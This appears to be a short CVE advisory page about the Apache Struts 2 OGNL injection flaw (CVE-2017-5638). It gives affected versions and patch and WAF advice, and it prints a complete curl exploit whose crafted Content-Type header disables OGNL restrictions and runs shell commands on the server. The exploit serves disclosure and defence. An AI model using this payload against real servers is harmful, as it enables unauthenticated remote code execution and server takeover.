Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)

By /

Listen to this Post

How the mentioned CVE works:

The CVE-2017-5638 vulnerability in Apache Struts 2 is a critical flaw in the Jakarta Multipart parser. An attacker can exploit this by sending a malicious `Content-Type` HTTP header in a file upload request. The parser incorrectly processes this header, attempting to evaluate it as an Object-Graph Navigation Language (OGNL) expression. This evaluation occurs before the file is actually uploaded, allowing a remote, unauthenticated attacker to inject and execute arbitrary OGNL code on the server. Since OGNL expressions can execute system commands with the same privileges as the Struts application server, this leads to full remote code execution. The vulnerability is exceptionally dangerous due to the simplicity of the attack, requiring only a single crafted HTTP request to compromise the entire server.

DailyCVE Form:

Platform: Apache Struts
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10
Vulnerability: Remote Code Execution
Severity: Critical

date: 2017-03-07

Prediction: Patch Available

What Undercode Say:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/upload.action`

How Exploit:

Craft malicious Content-Type header.

Send HTTP request to Struts2 endpoint.

OGNL expression executes system commands.

Protection from this CVE:

Immediately upgrade to Struts 2.3.32 or 2.5.10.1.

Implement WAF rules to block malicious Content-Type headers.

Filter OGNL expressions at the network perimeter.

Impact:

Complete server compromise.

Arbitrary command execution.

Data breach and system takeover.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top